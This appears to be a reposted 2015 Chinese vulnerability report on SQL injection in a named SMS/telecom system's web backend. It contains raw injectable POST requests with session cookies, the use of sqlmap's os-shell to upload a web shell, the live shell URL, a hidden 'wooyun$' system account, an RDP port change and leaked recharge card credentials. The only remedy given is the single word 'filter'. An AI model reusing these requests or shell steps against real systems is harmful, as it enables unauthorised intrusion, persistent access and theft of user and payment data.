首页 > 安全 > 网站安全 >

多打电话某系统SQL注入漏洞19个库DBA权限可充值(已Getshell+3389)

2015-08-28

多打电话某系统SQL注入漏洞19个库DBA权限可充值(已Getshell+3389)详细说明: POST do showfrees php HTTP 1 1Content-Length: 49Content-Type: application x-www-form-urlencodedReferer: http:

多打电话某系统SQL注入漏洞19个库DBA权限可充值(已Getshell+3389)

POST /do/showfrees.php HTTP/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Referer: http://log.iddsms.com:80/
Cookie: PHPSESSID=0qvtojevmi3q6u8eik14p9hk45; phpMyAdmin=bs8fod59n8t6hruc96r7hlpnaq3rk4k9; 

pma_lang=en; pma_collation_connection=utf8_general_ci; pma_mcrypt_iv=1qvTC%2Fd4Ngg%3D
Host: log.iddsms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) 

Chrome/41.0.2228.0 Safari/537.21
Accept: */*

sButton2=%c9%b8%d1%a1&number=1&searchAction=1


参数:number

POST /do/showhmd.php HTTP/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Referer: http://log.iddsms.com:80/
Cookie: PHPSESSID=0qvtojevmi3q6u8eik14p9hk45; phpMyAdmin=bs8fod59n8t6hruc96r7hlpnaq3rk4k9; pma_lang=en; pma_collation_connection=utf8_general_ci; pma_mcrypt_iv=1qvTC%2Fd4Ngg%3D
Host: log.iddsms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

sButton2=%c9%b8%d1%a1&number=1&searchAction=1&username=1





参数:username


QQ图片20150712211851.png


QQ图片20150712212025.png


QQ图片20150712212116.png




QQ图片20150712212245.png


QQ图片20150712212305.png





--os-shell 传个SHELL上去看看


QQ图片20150712212358.png



生成了两个文件

QQ图片20150712212448.png





直接上传SHELL


QQ图片20150712212534.png




QQ图片20150712212647.png




QQ图片20150712212751.png





用户收到的通知短信还包含了默认密码


QQ图片20150712212831.png


QQ图片20150712212933.png





充值卡号和密码

更改了3389端口



启用NMAP,扫出1988端口


QQ图片20150712213153.jpg


QQ图片20150712213211.jpg





就不进去了,省的把管理员T下线了.



SHELL地址:http://log.iddsms.com/logss.php

系统用户:wooyun$


解决方案:

过滤

相关文章
最新文章
热点推荐